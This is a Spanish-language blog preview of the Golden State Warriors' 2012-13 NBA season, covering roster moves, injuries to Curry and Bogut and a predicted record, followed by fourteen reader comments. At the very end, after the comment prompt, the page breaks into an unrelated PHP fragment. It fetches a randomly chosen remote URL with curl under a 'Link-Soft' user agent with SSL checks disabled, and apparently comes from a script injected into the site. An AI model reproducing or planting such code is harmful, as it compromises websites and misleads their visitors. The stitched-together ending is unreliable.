Golden State Warriors: Amanece en la bahía

07 de October de 2012 por Sancho88
Premisa número 1: lo mejor que le puede pasar a tu equipo predilecto de los suburbios de la liga es que vendan el equipo a un ricachón.

Premisa número 2: Y lo segundo mejor que le puede pasar es que al ricachón se le caliente la chequera.

¡Bingo! Los astros se han alineado correctamente para los Warriors. Joe Lacob, el hombrecillo que fue abucheado por cerca de 20.000 personas la pasada temporada tras la venta de Monta Ellis (imborrable estampa), este año pondrá 70 millones sobre la mesa, nada menos, para el material escolar de Oakland en el nuevo curso baloncestístico. Zapatitos de charol, colonia Johnson&Johnson, uniformes de Emidio Tucci para todos (a lo vanidoso) y la autoestima por los aires. Vaya, que solo falta meter la pelotita en la cesta.

Parece, pues, que van a intentar generar un proyecto a medio plazo con aspiraciones altas. Y si salen vivos de esta, el siguiente paso sería mudarse al otro lado del puente Golden Gate en 2017 y armar desde allí un proyecto de campeones.

Sí, suena a utopía, pero ¿para qué están los millones, si no valen para derrocharlos alegremente? Ahí están los Warriors, orgullosos ellos de su gesta. Novena plantilla por sueldos pero, lamentablemente, esto no les convierte en contenders, me temo. Todo sería muy distinto sin los 20 millones que estafarán entre Biedrins y Jefferson. Y pueden hacerlo también para el año que viene si ejercen su player option. ¿Alguien apuesta lo contrario?

Eso sí, despropósitos contractuales al margen, el equipo tiene muy buena pinta, aviso a navegantes. Si los hombres fuertes del equipo, véase Stephen Curry y Andrew Bogut, se reponen en condiciones de sus limitaciones físicas, podrían unirse a David Lee, que es la verdadera realidad del equipo, y juntos ‘colarse’ en la postemporada del salvaje Oeste. Y repito, que es una lástima saber que los dueños caminarán durante dos años con las manos atadas, pues están coqueteando peligrosamente con el impuesto de lujo para 2014. De no ser así, podríamos estar hablando de una realidad, de un contendiente más en próximos capítulos junto a Lakers, Thunder y Clippers.

Mientras eso ocurre, o no, la realidad para este año es que los Warriors van a competir de verdad. El Oeste tiene varios jefazos, pero el resto son clase media-alta, y los Playoffs prometen ser una lucha en las trincheras en la que los Warriors deben estar; y los tobillos de Curry y Bogut, también.

Sabiendo que Curry apenas jugó una veintena de partidos el año pasado, desde los despachos se han movido bien para hacerle un regalito al señor Mark Jackson, y así poder cubrir con garantías el puesto de base. Si la rotación del point guard no fue de lo peor del equipo el año pasado, con Robinson y Jenkins aportando en la faceta ofensiva, este año mejorará, pues cuentan con un cromo de auténtico lujo: elexpiring de Jarret Jack, quien llega a Oakland dentro del traspaso a tres bandas de Dorrell Wright a los Sixers, que incluía también a los Hornets. Está claro que la apuesta es fuerte, porque Jack fue el año pasado uno de los motores de los ‘abejorros’, y este año partirá teóricamente desde el banquillo como recambio de lujo para Curry.

curryVías de anotación y talento en el puesto de base no van a faltar, además de considerables dosis de defensa. Curry en buenas condiciones físicas es un buen defensor, roba balones y rebotea bien, y en ataque mantiene unos porcentajes impecables, rozando el 50% en tiros de campo y más del 40% en triples. No está mal para un base anotador que debe mejorar en sus pases a canasta, aunque tras la salida de Ellis tendrá que jugarse más balones. Por su talento, es improbable que este hecho suponga algún problema para él. Al contrario, podría dinamizar su juego ofensivo y convertirle en la principal amenaza exterior del equipo. El tercer base, Jenkins, también ha demostrado de sobra su talento el año pasado, y debería tener un puesto entre los 14. Así, las opciones de Jackson con sus bases se multiplican, e incluso podría acomodar a Jarret Jack al puesto de 2 en momentos concretos, al estilo de Billups en los Clippers; o liberar a Curry como escolta, que es su lugar predilecto, pero donde no puede rendir debido a su escasa estatura.

Si la dirección del equipo parece de gran calidad, no se puede negar tampoco el talento del juego exterior. No habrá problemas para repartir balones, y varios jugadores asumirán responsabilidades. En principio, Klay Thompson debe ser la referencia en anotación junto a Curry tras la salida de Monta Ellis. Su número de lanzamientos aumentará exponencialmente, igual que los de Curry, por lo que su efectividad podría bajar, aunque ya de por sí estamos hablando de jugadores muy fiables en el tiro a canasta a media y larga distancia. Thompson, eso sí, tiene la asignatura pendiente en la defensa. En la medida que mejore físicamente, se convierta en un jugador más fuerte y refuerce su capacidad de anotar multiplicando el número de tiros, podemos hablar de un jugador con un techo alto en el equipo.

Harrison BarnesAl sophomore se le unen Brandon Rush, quien renovó este verano por dos temporadas y 8 millones de dólares, y en los training camps está partiendo en el 5 inicial; y también aparecerá la gran incorporación de esta temporada (Bogut aparte) para los Warriors: Harrison Barnes. El alero de North Carolina llega para ser titular desde el principio, pero tendrá que demostrarlo en la pista. Pocos dudan de su potencial, aunque en los workouts previos al draft, su hype se desplomó, y de ser considerado en muchos mock drafts como un posible top3 del sorteo, finalmente bajó hasta la octava plaza. Y los Warriors hicieron bien en darle caza, pues el ‘halcón negro’ (su mote de guerra), puede aportar la necesaria actitud defensiva que necesitan los Warriors, y en ataque tiene buena mano. Con la cabeza de Curry y Jack dirigiendo, no va a tener ningún problema en tener buenas opciones para anotar, aunque su selección de tiro parece bastante cuestionable. No partirá como estrella en un proyecto con nombres de la talla de Curry, Bogut o David Lee, pero si asume su rol y es inteligente aportará grandes cosas al equipo.

Así, Richard Jefferson sería teóricamente suplente de Barnes, pues Rush y Thompson podrían jugar de escoltas. Ya sabemos lo que va a aportar Jefferson: rebote defensivo, sus triples en la esquina, alguna asistencia y poquito más. No está para muchos trotes, pero si los jóvenes del equipo le imbuyen de nuevo el espíritu de lucha que perdió hace muchos años, quizá sume su talento a un proyecto que ilusiona. Por último, Draymond Green podría completar la rotación de aleros, aunque su puesto natural es el de ala-pívot. Su principal tara es la altura, pues apenas alcanza los dos metros justitos, por lo que su reconversión a alero defensor que puede jugar el poste bajo parece bastante clara. No tiene mala mano, ni tirando ni pasando. Su rol en el equipo parece una incógnita y dependerá de su evolución y de cómo trabaje (sobre todo la defensa). No obstante, para Jackson puede ser un lujo contar con un comodín para el puesto de tres y de cuatro por si hay lesiones.

Bogut warriorsY llegamos por último a la pintura de los Warriors, un punto débil en las últimas temporadas que por fin parece bien armado para esta temporada. En anteriores capítulos de la NBA, la zona de carga y descarga del equipo permanecía abierta las 24 horas del día para los rivales, que se daban unos festines escandalosos. Pues bien, este año todo va a cambiar. Si las múltiples lesiones de Andrew Bogut no se vuelven a cebar con el pívot australiano, los Warriors pueden estar tranquilos. Tienen talento para anotar mucho, pero por fin tienen talento también para defender. Bogut aportará la intimidación necesaria que siempre le ha faltado al equipo, y calmará también algunas anginas de pecho, o úlceras de estómago, o cálculos en el riñón, o infecciones de orina provocadas en los seguidores ‘guerreros’ al observar los infructuosos intentos del trozo de carne, conocido anteriormente como Andris Biedrins, por defender la canasta de los Warriors, o lo que fuese que ha hecho o ha intentado hacer durante los últimos tres años de su vida.

Así, la pareja interior que van a formar Andrew Bogut (se le espera para el primer partido) y David Lee se antoja como una de las más poderosas de la Conferencia Oeste. Bogut tendrá el rol más defensivo y Lee más ofensivo, pero a primera vista se pueden complementar sin problemas. Lee es el jugador que tiró del carro el año pasado, se ha acomodado en el 20-10 y esta temporada ha de motivarse aún más, pues se espera de él mucho liderazgo, además de sus números. Le dará descansos Carl Landry, otro de los grandes fichajes del equipo. Llega también desde los Hornets, al igual que Jack. Tiene buena mano, ciertas dosis de talento y capacidad reboteadora. No parecen malos ingredientes para una rotación de calidad.

Para completar la pintura, ya decimos que Biedrins jugará, pues hay que intentar explotar esos 9 millones que estafa todos los años a la franquicia, pero el equipo se ha reforzado con el joven rookie Festus Ezeli. El jugador nigeriano será una buena opción para Jackson de cara a dosificar los minutos de Bogut. Se trata de un 7 pies que recuerda ligeramente a Mutombo por su corpulencia y presencia física, y que ha promediado más de 2 tapones en las ligas de verano. Jeremy Tyler sería la cuarta opción después de Bogut, Ezeli y Biedrins, pero no parece que pueda tener muchas opciones de quedarse en el equipo esta temporada. Optará a la decimocuarta plaza junto a Kent Bazemore, un escolta físico que no lo hizo mal tampoco en las ligas de verano.

Por tanto, la conclusión sobre los Warriors es que el equipo se ha reforzado muy bien con respecto al año pasado. Ahora son un equipo evolucionado en todos los aspectos, y que en pocas cosas se asemeja a aquellas llanuras del tránsito que dibujábamos en el análisis de la pasada temporada. Con al menos dos jugadores de nivel por posición, veteranía y juventud se mezclan en estos Warriors para hacer pensar con argumentos en un equipo de primera ronda de Playoffs. Además, por la idiosincrasia de juego de tipos como Curry, Thompson o Lee, el espectáculo parece garantizado. Muchos ya sueñan con rememorar los buenos tiempos del Run T-M-C, y es que 20 años después de Hardaway, Richmond y Mullin, parece que amanece de nuevo en la bahía de San Francisco. Solo las lesiones podrán emborronar una temporada que se presenta brillante para los ‘guerreros’ del estado dorado.

Quinteto: Curry, Klay Thompson, Harrison Barnes, David Lee, Andrew Bogut

6º hombre: Jarret Jack/Brandon Rush

Altas: Jarret Jack (New Orleans Hornets), Festus Ezeli (Vanderbilt Commodores), Carl Landry (New Orleans Hornets), Harrison Barnes (North Carolina), Kent Bazemore (Old Dominion), Draymond Green (Michigan State).

Bajas: Nate Robinson (Chicago Bulls), Kwame Brown (Philadelphia 76ers), Dominic McGuire (Toronto Raptors), Dorrel Wright (Philadelphia 76ers), Keith Benson (Atlanta Hawks).

Pronóstico: 43-39 (8º en temporada regular). Primera ronda de Playoffs.

Comenta

14 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Yo no les doy PO’s aún,pero si van a estar muy cerquita yo creo,este año es de confirmación,de que todos estén sanos por primera vez,de desarrollar el talento y amoldar piezas.Hay mucho percal en el oeste y eso se paga.Yo les pondría en un 9º-10º puesto con un 50% de victorias.

    Equipo interesante de ver,están muy equilibrados entre backcourt y frontcourt

      Citar

  2. M dice:
    #2

    Conclusión uno: Hay equipo para pelear. Me gusta, Curry me parece un lujo para el espectador.

    Conclusión dos: El autor del artículo ama a Biedrins xD

    Un saludo 🙂

      Citar

  3. Viva_Dirk dice:
    #3

    Es una pena pero creo que lo tienen muy jodido, su exito esta ligado a la salud de 2 jugadores que no suelen disfrutar de ella. Con ellos a tope son un equipo de muchísimo talento y que podria llegar a estar entre los favoritos en 2 años, pero es que no van a estar sanos.

    Su esperanza es hacer una regular season lo mejor posible aunque ellos se pierdan 20 o 30 partidos y que esten bien en play-offs si llegan a ellos.

      Citar

  4. Denise dice:
    #4

    Creo que no entraran en playoffs debido al gran nivel de la Conferencia Oeste.

    En mi opinión, todavía les falta un par de piezas para convertirse en equipo grande. Les faltaría otro buen jugador exterior para formar un gran perimetro con Curry y Thompson, el cual todavía tiene mucho por mejorar.
    Y lo siento por un tal Lemontus..que decía que Bogut era mejor que Howard. Yo en el australiano no confío. Todavía puede dar guerra y asegurarte un 13-8 ..pero si quieren aspirar a ser alguien en el Oeste, deberían contar con un 5 mas físico y mas sano.

    Lo de Biedrins son esos casos expediente X, aun recuerdo un articulo de Daimiel llamado Los 3 Reyes Magos, hacía referencia a los 3 jugadores mas prometedores, y Biedrins era uno de ellos..

    Sancho…que tal un trade entre Biedrins y Salmons 🙂

    Pronóstico: 9º o 10º del Oeste, si suponemos que 44 victorias sea la cifra para asegurarte en el Oeste la octava plaza, les daré un 40-42

      Citar

  5. Schize dice:
    #5

    Es un equipo que me gusta pero no lo veo claro, me temo que habrán lesiones. 38-44 y fuera de playoffs

      Citar

  6. Txusma dice:
    #6

    Habláis de Stephen Curry como si fuera miembro del club “cristal de bohemia”. Ha pasado un año de lesiones pero no tiene pq caer en esa espiral.

      Citar

  7. Sancho88 dice:
    #7

    Hombre, el chavla ha tenido mala suerte en los meses pre-lockout.. Dos operaciones de tobillo en total, casi 5 esguinces fuertes… pero es joven, se repondrá, igual qu eTyreke de su fascitis. Y mira, Tyreke a su mejor nivel es buen jugador en realidad, pero es q de Curry todavia no hemos visto su mejore nivel, podría estar a la altura de los 5-6 mejores bases de la competición, porque tiene el coco muy bien puesto

      Citar

  8. Jabho dice:
    #8

    Pues yo apuesto por un buen año de Bogut y Curry. Veremos porque si creo que van a dar guerra.

      Citar

  9. rumbero dice:
    #9

    Pues lo dicho, sus aspiraciones se aguantan en los tobillos de Curry y Bogut pero a su vez se han movido relativamente bien en los despachos como para que el equipo no se diluya a la primera lesión. Un acierto el fichaje de Jack que dará minutos de calidad y hará que Stephen no tenga que forzar tanto para no caer en ese club de cristal de bohemia. Y Landry debería sumar en ese solar que era hasta ahora la pintura. A mi me gustaría que tuvieran un poquito de suerte con las lesiones, a ver si vemos al mejor Curry, a donde llegan Thompson y Barnes y como se complementan Lee y Bogut. Los Warriors molan.

      Citar

  10. Esteban dice:
    #10

    estoy seguro que estaran en PO, han logrado darle una profundidad a su equipo asombrosa

    si curry falta algunos juegos, bien lo puede cubrir jack, que ademas sera un sexto hombre de lujo total para dar aire y gol desde el banco

    si falta bogut, este equipo lo sufrira en defensa si, pero tienen muchisimas opciones en el canasto de enfrete como no sentirlo,landy no puede jugar de centro, pero es otra cuota de aire y gol desde la banca

    rush termino la pasada temporada de forma exelente y jefferson, aun puede dar algunas cosas como bien dice sancho

    su 5 inicial es muy bueno, BARNES estoy seguro q funcionara desde el dia uno,

    en si, un proyecto envidiable, ya tienen las bases para el futuro en sus 3 perimetrales, pero ademas, van a competir desde ahora y le daran esa idea a esos tios, a ganar de entrada,

    las dudas a mi no em pasan por las lesiones de curry y bogut, por q si se pieden ambos media temporada, no hay dudas, no entraran a PO, pero si se pierden algunos juegos pueden reemplazarlo

    las dudas son

    mark jackson, es muy facil criticar como periodista, pero aun como entrenador nod emostro nada y el año pasado si bien no tenia material, tampoco exploto lo q tenia, DEMASIADO EQUIPO APRA UN ENTRENADOR INCIERTO, con jerry sloan estos muchachos entran a PO de cabeza

    klay thompson, tuvo un cierre de año fenomenal tras la salida de ellis, peeeeero, le toco jugar los juegos donde los warriors iban decididos a la loteria, sin presiones y muchos partido hasta maquillando estadisticas, MUY AL ESTILO ANDREY BLATCHE

    habra q ver como responde con la responsabilidad y la presion de salir desde el juego uno como el escolta titular y referencia perimetral del equipo, para mi cualidades tiene, ahor habra que ver como responde de la cabeza, en principio le sobra para ser titular e irse entre los 15 y 20 ppp,

    si jackson es biuen entrenador, thompson cumple las expectativas y no tienen lesiones DE GRAVEDAD SERIA, estaran en PO

      Citar

  11. Melo15 dice:
    #11

    Yo me reafirmo que los Warriors dependen de las lesiones, y perder un partido un partido menos te decide la clasificacion en el Oeste, ya lo vimos el año pasado.
    Esteban, yo tengo una duda, creo que Thompson va a salir desde el bancom, un rol parecido al de James Harden o Ginobili, creo que es un jugador de las misma caracteristicas de Curry y no se si se compenetraran bien.
    Yo apuesto por un Curry-Rush-Barnes-Lee-Bogut con Jack y aThompson desde el banco.

      Citar

  12. TheDeerHunter dice:
    #12

    El oeste es una selva… y un 50% no vale para nada.
    Es mal escenario para un proyecto fundamentado en jovenes y dudas. Al menos este año hay mimbres y sentido.
    Les doy 35-40 victorias.

      Citar

  13. GreenPride dice:
    #13

    Equipo muy interesante de ver este año. Se han movido realmente bien consiguiendo muy buenos jugadores exteriores (Jack) e interiores (Bogut, Landry) para complementar lo que ya tenian. Para mí son claros aspirantes a PO en el Oeste y como todos decís va a depender mucho su andadura de la salud que puedan tener sus probablemente dos jugadores franquicia Curry y Bogut. Si ambos consiguen mantenerse sanos, cosa que últimamente no han conseguido yo les veo luchando claramente por entrar en PO y dando algún quebradero de cabeza en ellos. Si no, se caerán de la lucha pero desde luego es uno de los equipos a los que me apetece ver este año

      Citar

  14. R1Molano dice:
    #14

    Por ahora a la espera de ver a Bogut (y a Green) todo lo demás va de lujo.
    A Curry se le ve recuperado y sin ningún punto menos en el tiro o la dirección. El próximo paso sera re-firmarlo por unos 10M anuales antes del 31 Octubre que se cierre el plazo.

    Ezeli y Barnes están jugando muy muy bien. Lo de Barnes a largo plazo promete como jugador titular muy muy solido. Ezeli jugando asi va a ser un C suplente de lujo por 5M en 4 años (Larry Riley es un autentico fenómeno)
    La dupla de cuatros es excepcional. El puesto de 3 promete competencia feroz.
    Yo sobre Thompson no tengo interrogantes, esta progresando mucho y este año ataca el aro con contundencia. En todo caso, es un jugador de un IQ fabuloso (e hijo de jugador y con NBA mamada desde la cuna).

    La posición de base, aun si Curry se pierde unos 10-15 partidos esta bien cubierta, aunque esta claro que Curry nos hace pegar un salto enorme.

    Sobre lo que comentas de Lacob-Gruber y la inversión, diría que es una inversión mas extradeportiva que deportiva en si. Apenas estamos 400.000 sobre el impuesto de lujo.
    El traslado a SF en un pabellón lujo máximo con todo inversión de capital privado, la compra del filial D-League y colocación de este en Santa Cruz (rondando los 1000 socios, todo un éxito, por cierto), soltarle la millonada a Jerry West para hacer de asistente….

    Aparte de la salud, hay dudas sobre Mark Jackson, que cuenta con Malone y un largo y caro equipo detrás. El principal debe del equipo es la defensa y es donde Jackson ha insistido el año pasado. No hay un equipo, nombre por nombre, para ser un equipo durisimo, pero ya el año pasado se vio un equipo intensisimo en defensa y ese es el camino.
    Otro debe es la ineficacia en los finales, veremos como se plantea este año (aunque realmente es una competencia de Malone, no de Jackson), el equipo para el cluth es bastante completito con Curry, Thompson y Barnes y la pareja de grandes pasadores interiores.

    A Biedrins no se le espera, todo lo que pueda aportar, aunque sea hacerle las 6 faltas a Howard, bienvenido será. De primeras ha sido el unico warrior que no ha ido a los entrenamientos voluntarios, aunque ha estado entrenando en Santa Barbara con Al Jefferson.

    En 9 meses lo vemos, para mi, con Curry sano, Ezeli y Barnes a este nivel y si Bogut esta bien y juega un 80% de los partidos y a un 80% de lo que era antes de la lesión de codo… 51-31

    Si salen las cosas bien-regular podemos aspirar a unas 43-44 victorias. Si hay mucha lesión y los rookies no despuntan… en torno a las 34-38

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>